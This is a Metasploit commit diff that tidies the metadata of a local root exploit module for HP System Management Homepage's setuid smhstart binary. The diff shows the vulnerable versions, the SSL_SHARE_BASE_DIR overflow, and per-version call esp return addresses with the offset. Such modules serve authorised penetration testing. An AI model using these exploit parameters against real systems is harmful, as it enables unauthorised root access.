Landing rapid7#1695, agix's smhstart local root exploit

jvazquez-r7 · jvazquez-r7 · commit 0c25ffb4dedf · 2013-04-06T17:32:12.000+02:00
diff --git a/modules/exploits/linux/local/hp_smhstart.rb b/modules/exploits/linux/local/hp_smhstart.rb
@@ -23,12 +23,14 @@ def initialize(info={})
 		super( update_info( info, {
 				'Name'          => 'HP System Management Homepage Local Privilege Escalation',
 				'Description'   => %q{
-					Versions of hpsmh <= 7.1.1 setuid root smhstart is vulnerable to local buffer overflow in SSL_SHARE_BASE_DIR env variable.
+						Versions of HP System Management Homepage <= 7.1.2 include a setuid root
+					smhstart which is vulnerable to a local buffer overflow in SSL_SHARE_BASE_DIR
+					env variable.
 				},
 				'License'       => MSF_LICENSE,
 				'Author'        =>
 					[
-						'agix'           #@agixid
+						'agix' # @agixid # Vulnerability discovery and Metasploit module
 					],
 				'Platform'      => [ 'linux' ],
 				'Arch'          => [ ARCH_X86 ],
@@ -40,21 +42,21 @@ def initialize(info={})
 					},
 				'References'    =>
 					[
-						['OSVDB', '91812'] #not exactly but there is none...
+						['OSVDB', '91990']
 					],
 				'Targets'       =>
 					[
-						[ 'Hpsmh 7.1.1',
+						[ 'HP System Management Homepage 7.1.1',
 							{
 								'Arch' => ARCH_X86,
-								'CallEsp' => 0x080c86eb,	#call esp
+								'CallEsp' => 0x080c86eb, # call esp
 								'Offset' => 58
 							}
 						],
-						[ 'Hpsmh 7.1.2',
+						[ 'HP System Management Homepage 7.1.2',
 							{
 								'Arch' => ARCH_X86,
-								'CallEsp' => 0x080c8b9b,	#call esp
+								'CallEsp' => 0x080c8b9b, # call esp
 								'Offset' => 58
 							}
 						],
